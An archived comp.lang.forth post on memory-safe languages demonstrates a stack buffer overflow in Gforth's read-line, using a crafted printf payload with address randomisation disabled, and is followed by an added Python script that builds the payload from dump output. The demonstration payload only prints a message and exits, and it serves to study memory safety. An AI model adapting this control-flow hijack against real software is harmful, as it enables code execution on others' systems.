
   comp.lang.forth      117,927 messages


   Message 116,246 of 117,927   
   Anton Ertl to Anton Ertl   
   Re: push for memory safe languages -- im   
   02 Mar 24 09:57:01   
   
   From: anton@mips.complang.tuwien.ac.at   
      
   anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:   
   >If you want an example, here's one that targets the Gforth version I   
   >am currently working with:   
   >   
   >: MaliciousCode ( -- )   
   >  ." This code is malicious!" cr   
   >  ." It will not execute normally." cr   
   >  bye ;   
   >   
   >create buffer1 8 allot   
   >   
   >:noname buffer1 96 stdin read-line . ; execute   
   >bye   
   >   
   >When I put this into a file xploit.fs and then perform   
   >   
   >printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
   >  setarch `uname -m` -R gforth xploit.fs   
   >   
   >I get the following output:   
   >   
   >This code is malicious!   
   >It will not execute normally.   
      
   I forgot to give a recipe for the printf above:   
      
   insert   
      
   ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
      
   right before the execute, and the dumps contain the bytes you have to   
   put into the printf after the 80th byte, in that order.  I.e.:   
      
   : MaliciousCode ( -- )   
     ." This code is malicious!" cr   
     ." It will not execute normally." cr   
     bye ;   
      
   create buffer1 8 allot   
      
   :noname buffer1 96 stdin read-line . ;   
   ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop   
   execute   
   bye   
      
   and run it with   
      
   echo|setarch `uname -m` -R gforth xploit.fs
      
   For the particular Gforth at hand, this produces:   
      
   7FFFE9E43160: 33 5B 57 55  55 55 00 00 -                           3[WUUU..   
      
   7FFFE9AF6FF0: 68 DC ED E9  FF 7F 00 00 -                           h.......   
      
   exactly the bytes in the printf above.   
      
   - anton   
   --   
   M. Anton Ertl  http://www.complang.tuwien.ac.at/anton/home.html   
   comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html   
        New standard: https://forth-standard.org/   
      EuroForth 2023: https://euro.theforth.net/2023   
      
   --- SoupGate-Win32 v1.05   
    * Origin: you cannot sedate... all the things you hate (1:229/2)   
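The recipe in the post above, turned into a script (added here as an example; it is not code from Anton's post). It parses the two `dump` lines, places their bytes after the 80-byte filler in the order they were dumped, and prints the printf command. The dump text, the 80-byte offset and the 96-byte read-line limit are taken from the post; the function names, the regular expression and the two sanity checks are this script's own assumptions.

```python
"""Build the printf argument for the Gforth read-line overflow from the
two `dump` lines the recipe prints.

Added example, not code from the post.  The dump lines, the 80-byte
filler offset and the 96-byte read-line limit come from the post; the
function names and the payload checks are this script's own.
"""
import re
import struct

# Constructed input: the two 8-byte dump lines quoted in the post.
DUMP_TEXT = """\
7FFFE9E43160: 33 5B 57 55  55 55 00 00 -                           3[WUUU..
7FFFE9AF6FF0: 68 DC ED E9  FF 7F 00 00 -                           h.......
"""

FILLER_LEN = 80   # bytes before the cells being overwritten (from the post)
READ_LIMIT = 96   # `buffer1 96 stdin read-line` reads at most 96 bytes

# Gforth `dump` layout: "<addr>: <hex bytes> - <ascii>"
DUMP_RE = re.compile(r"^\s*([0-9A-Fa-f]+):\s*((?:[0-9A-Fa-f]{2}\s+)+)-")


def parse_dump(text):
    """Return [(address, bytes)] for every dump line found in `text`."""
    cells = []
    for line in text.splitlines():
        m = DUMP_RE.match(line)
        if m:
            hexbytes = "".join(m.group(2).split())
            cells.append((int(m.group(1), 16), bytes.fromhex(hexbytes)))
    return cells


def build_payload(dump_text, filler_len=FILLER_LEN):
    """Filler bytes, then the dumped cells in the order they were dumped."""
    filler = ("0123456789" * (filler_len // 10 + 1))[:filler_len].encode()
    tail = b"".join(data for _, data in parse_dump(dump_text))
    return filler, tail


def check_payload(filler, tail, limit=READ_LIMIT):
    """Reject payloads that read-line cannot deliver intact.

    read-line stops at the line terminator, so a 0x0a byte inside one of the
    addresses would cut the line short; bytes beyond `limit` are never read.
    """
    if b"\n" in tail:
        raise ValueError("address bytes contain LF; read-line would stop early")
    if len(filler) + len(tail) > limit:
        raise ValueError("payload longer than the read-line limit")
    return True


def to_printf_arg(filler, tail):
    """Filler as literal digits, the cell bytes as printf \\xNN escapes."""
    return filler.decode() + "".join("\\x%02x" % b for b in tail)


def decode_cells(tail):
    """Read the tail back as little-endian 64-bit cells (the two addresses)."""
    return [struct.unpack_from("<Q", tail, i)[0] for i in range(0, len(tail), 8)]


if __name__ == "__main__":
    filler, tail = build_payload(DUMP_TEXT)
    check_payload(filler, tail)
    print('printf "%s"|setarch `uname -m` -R gforth xploit.fs'
          % to_printf_arg(filler, tail))
    for cell in decode_cells(tail):
        print("cell: 0x%016x" % cell)
```

Run against the two dump lines from the post, `to_printf_arg` reproduces the printf argument quoted at the top of the message byte for byte; `decode_cells` shows the two cells as integers (the 8 bytes dumped from `' call -2 cells +` first, the xt of MaliciousCode second), which is a quick way to confirm the byte order before feeding the output to a fresh Gforth run.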



(c) 1994,  bbs@darkrealms.ca